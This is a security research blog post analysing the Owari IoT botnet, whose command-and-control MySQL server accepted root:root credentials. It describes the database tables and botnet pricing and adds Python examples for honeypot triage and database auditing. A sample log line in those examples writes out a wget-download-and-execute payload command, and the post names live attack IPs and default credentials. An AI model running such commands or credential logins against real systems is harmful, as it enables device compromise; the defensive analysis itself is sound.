Hacker Fail: IoT botnet command and control server accessible via default credentials

NewSky Security
Published in NewSky Security
4 min read · Jun 4, 2018

In an irony of epic proportions, we observed that an IoT botnet variant, Owari, which relies on default/weak credentials to hack IoT devices, was itself using default credentials on its command and control server, allowing read/write access to its server database.

Owari’s MySQL database

The Mirai botnet was designed to set up a MySQL server for its command and control containing three tables, namely users, history, and whitelist. While IoT botnets have evolved and many of them use different attack vectors, most of them still retain this tried and tested MySQL server structure, and Owari is no exception.

We observed a few IPs attacking our honeypots with default credentials and executing commands such as /bin/busybox OWARI after a successful login. In one of the cases, the bot attempted to download and run a payload hosted on 80(.)211(.)232(.)43.
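The honeypot observation above is the kind of signal a defender can turn into a triage routine. The following Python is an added example, not code from the original post or from NewSky Security: it walks constructed honeypot session lines (the log format, the source IPs, the download host and the non-Owari marker OTHERBOT are all made up), groups them per source IP, records the `/bin/busybox <MARKER>` string a Mirai-derived bot sends after login (the OWARI marker comes from the post; matching any upper-case marker is my generalization), and extracts defanged payload-hosting hosts for blocklisting or reporting.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample honeypot session log (not real data).
# Assumed line format: "<timestamp> <src_ip> <event> <detail>"
SAMPLE_LOG = """\
2018-06-01T10:02:11Z 198.51.100.7 login-success user=admin pass=admin
2018-06-01T10:02:12Z 198.51.100.7 command /bin/busybox OWARI
2018-06-01T10:02:13Z 198.51.100.7 command cd /tmp; wget http://203.0.113.9/bins/arm7; chmod +x arm7; ./arm7
2018-06-01T10:05:40Z 192.0.2.44 login-failed user=root pass=12345
2018-06-01T10:05:41Z 192.0.2.44 login-success user=root pass=root
2018-06-01T10:05:42Z 192.0.2.44 command /bin/busybox OTHERBOT
2018-06-01T10:09:03Z 192.0.2.44 command uname -a
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<event>\S+) (?P<detail>.*)$")
# Mirai-derived bots run "/bin/busybox <MARKER>" right after login to probe the
# shell; the post records the OWARI marker, the pattern generalizes to any
# upper-case marker of three or more letters (my assumption).
BUSYBOX_MARKER_RE = re.compile(r"/bin/busybox\s+([A-Z]{3,})")
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;]+")


def defang(ip: str) -> str:
    """Render an address as 203(.)0(.)113(.)9 so it is safe to paste into reports."""
    return ip.replace(".", "(.)")


def triage(log_text: str) -> Dict[str, dict]:
    """Group honeypot events per attacking IP and pull out the indicators."""
    sessions: Dict[str, dict] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not follow the assumed format
        src, event, detail = m["src"], m["event"], m["detail"]
        s = sessions.setdefault(
            src, {"login_creds": [], "markers": [], "payload_urls": [], "payload_hosts": []}
        )
        if event == "login-success":
            creds = dict(kv.split("=", 1) for kv in detail.split() if "=" in kv)
            s["login_creds"].append(f"{creds.get('user')}:{creds.get('pass')}")
        elif event == "command":
            mk = BUSYBOX_MARKER_RE.search(detail)
            if mk:
                s["markers"].append(mk.group(1))
            for url in URL_RE.findall(detail):
                s["payload_urls"].append(url)
                host = urlsplit(url).hostname
                if host:
                    s["payload_hosts"].append(defang(host))
    return sessions


def owari_sessions(sessions: Dict[str, dict]) -> List[str]:
    """Source IPs whose session carried the Owari busybox marker."""
    return sorted(src for src, s in sessions.items() if "OWARI" in s["markers"])


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("Owari sessions:", owari_sessions(result))
    for src, s in result.items():
        print(src, s["markers"], s["login_creds"], s["payload_hosts"])
```

The marker string is a cheap, high-precision way to attribute a session to a bot family in honeypot data; the payload host list is what you would hand to a blocklist or to the hosting provider's abuse desk.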

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.

We investigated this IP further. To our surprise, its MySQL database was accessible with one of the weakest credential pairs known to mankind.

Username: root
Password: root

Database investigation

The users table contains login credentials for the various users who control the botnet. Some of them may be the botnet's creators; others may simply be customers of the botnet, a.k.a. black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, each user has a duration limit (how long the user may run a DDoS attack), a maximum number of bots available for an attack (-1 means the bot master's entire botnet army is available) and a cooldown time (the interval required between two attack commands).

In this specific Owari case, we observed one user with a duration limit of 3600 seconds and permissible bot usage set to -1 (maximum). It is worth noting that the credentials of all these botnet users are also weak.

User with a duration limit of 3600 seconds and permissible bot usage set to -1 (maximum)

In the history table, we can see DDoS attacks carried out against various IPs. A few of these IPs were IoT-botnet related, which led us to speculate that the attacker may have been attacking rival botnet operators.

History table

The next table, whitelist, which is supposed to hold a "do not attack these IPs" list, was empty, implying that the bot makes no distinction and attacks every device it can.

Whitelist table

This IP was not a standalone case of a database exposed via weak credentials. The MySQL database of another attack IP (80.211.45.89) was also accessible with "root:root" credentials.
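Once an analyst has a copy of such a database (from a takedown, a seized server, or a dump shared by a hosting provider), the three tables described above can be triaged mechanically. The Python below is an added example, not the post's or NewSky Security's code: it loads constructed rows into an in-memory SQLite copy of the users/history/whitelist layout, flags users whose passwords are weak or equal to their username, reports each user's duration limit, cooldown and bot allowance (rendering -1 as "entire botnet"), tallies history targets against a caller-supplied list of known botnet IPs, and checks whether the whitelist is empty. The column names (duration_limit, cooldown, max_bots, admin, time_sent, command, prefix, netmask) and the "attack command's second token is the target" convention are assumptions loosely modelled on the leaked Mirai schema; a real Owari dump may differ.

```python
import sqlite3
from typing import Dict, Iterable, List, Tuple

# Assumed schema, modelled on the Mirai-style C&C database described above.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT,
                    duration_limit INTEGER, cooldown INTEGER, max_bots INTEGER, admin INTEGER);
CREATE TABLE history (id INTEGER PRIMARY KEY, user_id INTEGER, time_sent INTEGER,
                      duration INTEGER, command TEXT);
CREATE TABLE whitelist (id INTEGER PRIMARY KEY, prefix TEXT, netmask INTEGER);
"""

# Constructed rows (not data from the real server). The first user mirrors the
# post's observation: 3600 s duration limit, max_bots = -1, weak credentials.
SAMPLE_ROWS = {
    "users": [
        (1, "root", "root", 3600, 0, -1, 1),
        (2, "spot1", "password", 600, 60, 50, 0),
    ],
    "history": [
        (1, 1, 1527800000, 300, "udp 203.0.113.9 300"),
        (2, 2, 1527803600, 600, "syn 198.51.100.7 600"),
        (3, 1, 1527807200, 300, "udp 203.0.113.9 300"),
    ],
    "whitelist": [],  # empty, as observed in the post
}

# Small constructed list of default/weak passwords for the audit.
WEAK_PASSWORDS = {"root", "toor", "admin", "password", "123456", "12345"}


def load_sample() -> sqlite3.Connection:
    """Build the in-memory database from SCHEMA and SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        if rows:
            placeholders = ",".join("?" * len(rows[0]))
            conn.executemany(f"INSERT INTO {table} VALUES ({placeholders})", rows)
    conn.commit()
    return conn


def audit_users(conn: sqlite3.Connection) -> List[Dict]:
    """Summarize each operator/customer account and flag weak credentials."""
    query = "SELECT username, password, duration_limit, cooldown, max_bots, admin FROM users"
    report = []
    for username, password, duration, cooldown, max_bots, admin in conn.execute(query):
        report.append({
            "username": username,
            "weak_password": password in WEAK_PASSWORDS or password == username,
            "duration_limit_s": duration,
            "cooldown_s": cooldown,
            # -1 means the whole botnet is available to this user
            "bots": "entire botnet" if max_bots == -1 else max_bots,
            "admin": bool(admin),
        })
    return report


def history_targets(conn: sqlite3.Connection,
                    known_botnet_ips: Iterable[str]) -> List[Tuple[str, int, bool]]:
    """Count attacks per target and mark targets that are themselves botnet IPs."""
    known = set(known_botnet_ips)
    counts: Dict[str, int] = {}
    for (command,) in conn.execute("SELECT command FROM history"):
        parts = command.split()
        if len(parts) < 2:
            continue  # malformed row; skip rather than guess
        target = parts[1]  # assumed layout: "<method> <target> <duration>"
        counts[target] = counts.get(target, 0) + 1
    return sorted((t, n, t in known) for t, n in counts.items())


def whitelist_is_empty(conn: sqlite3.Connection) -> bool:
    """An empty whitelist means no address is exempt from attack."""
    return conn.execute("SELECT COUNT(*) FROM whitelist").fetchone()[0] == 0


if __name__ == "__main__":
    db = load_sample()
    for user in audit_users(db):
        print(user)
    print(history_targets(db, {"203.0.113.9"}))
    print("whitelist empty:", whitelist_is_empty(db))
```

The history tally is the step that supported the post's speculation about rival operators: a target that also appears in your own list of known C&C or bot IPs is evidence of botnet-on-botnet attacks rather than customer-driven ones.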

Understanding the revenue model

With some of the Owari variant code having been leaked on underground forums, it is difficult to pinpoint the people involved in these specific attacks. However, to understand more about how this user database is used, we decided to talk to a known Owari operator called "Scarface", who had the following to say about attack time, cooldown and the prices charged to users of the Owari botnet.

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count. I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

-Scarface

Remediation

One might assume that with write access to the MySQL database, one could disrupt the botnet by deleting its contents. Sadly, it is not that simple for most IoT botnets, as these C&C-related IPs already have a very short shelf life (a week on average). Botnet operators know that their IPs will soon be flagged because of the malicious traffic, so to stay under the radar they voluntarily rotate attack IPs. Both IPs mentioned in this blog are already offline. NewSky Security IoT Halo protects against and remediates the Owari botnet.

Ankit Anubhav, Principal Researcher, NewSky Security

Special thanks to Dr. Vesselin Bontchev (@vessonsecurity)


We aim to enable enterprise-level security protection for all connected devices. #IoT #DataSecurity https://newskysecurity.com/